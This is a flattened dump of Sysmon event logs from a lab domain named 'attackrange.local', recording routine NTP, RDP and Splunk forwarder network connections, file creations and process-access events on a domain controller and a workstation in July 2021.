SERVICEtcpfalsefalse181.214.206.155-22873-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000809851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:46.615{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse20.101.57.9-123ntp 354300x8000000000000000809850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:46.615{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal123ntp 23542300x8000000000000000809849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:48.170{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B00B9FBD0A011D76D8DD094C713CA8FD,SHA256=0D1250EBF216489F87E6DD1D9C7D9AAEC7860EE36662B303D9476BD0F9B6106F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:40.546{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57425-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001053457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:39.993{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-890.attackrange.local123ntpfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal123ntp 
23542300x8000000000000000809848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:48.029{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8761821C944218C34A864EACE2D55A4,SHA256=0759E34E22F08CD83D703DBE3D070878CEA7FF861B8B53B88EE492F769560407,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:48.029{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D88D061634185C178D312CEC7130C89,SHA256=662D5254B5325DB38D14F8A30E52B75E990F707965312B378C4B9EDCA951BBA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:49.478{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64970F2047FD4B11EF8874FE20BB8301,SHA256=9655E31B5D0E63980CA3487BAF9D8927CE1DAC9A43D7E9874F4F31370D10838E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:49.201{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0CA47419AEEAA2C3F4C139038193456,SHA256=5699A4B3DB54FFE93E396414F0F6382B9FA2A805B475E8ED02D8664492017EFD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.761{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A2-60EB-D17D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.746{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:50.746{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.746{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:50.746{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.746{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7A2-60EB-D17D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.746{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A2-60EB-D17D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.727{466BC892-F7A2-60EB-D17D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.509{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E08A7B5ABD504C9B204037D372B3480D,SHA256=4E8525A5CD0957F38AB1D016CE73D7E2D8EC0B7E8F9FE425BCE6F04CD99A0C4A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:50.217{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34776863094689F3202E57824F3E7E0E,SHA256=897A0584CAE33BF272A6E45134741E240ADEDCC421EF2FAAEB9315944CD66312,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.393{466BC892-F7A2-60EB-D07D-00000000CF01}45644760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001053469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:42.655{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61926-false10.0.1.12-8000- 10341000x80000000000000001053468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A2-60EB-D07D-00000000CF01}4564C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7A2-60EB-D07D-00000000CF01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:50.193{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A2-60EB-D07D-00000000CF01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:50.193{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.162{466BC892-F7A2-60EB-D07D-00000000CF01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.546{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D6EC3358172ED6C8799D5977631010,SHA256=ED2213632EC83B16F2E805313EAA5FA4427FC961F4047A9893A8C944130DEB45,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:50.303{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57426-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:51.232{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6214B57394EB0ED38898A923401FD09F,SHA256=0BE8C96740BFA25EFFBA913C8937B39FED17251D4F0B5D9AB00AC1F1B9E54355,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.524{466BC892-F7A3-60EB-D27D-00000000CF01}56049792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A3-60EB-D27D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:51.346{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 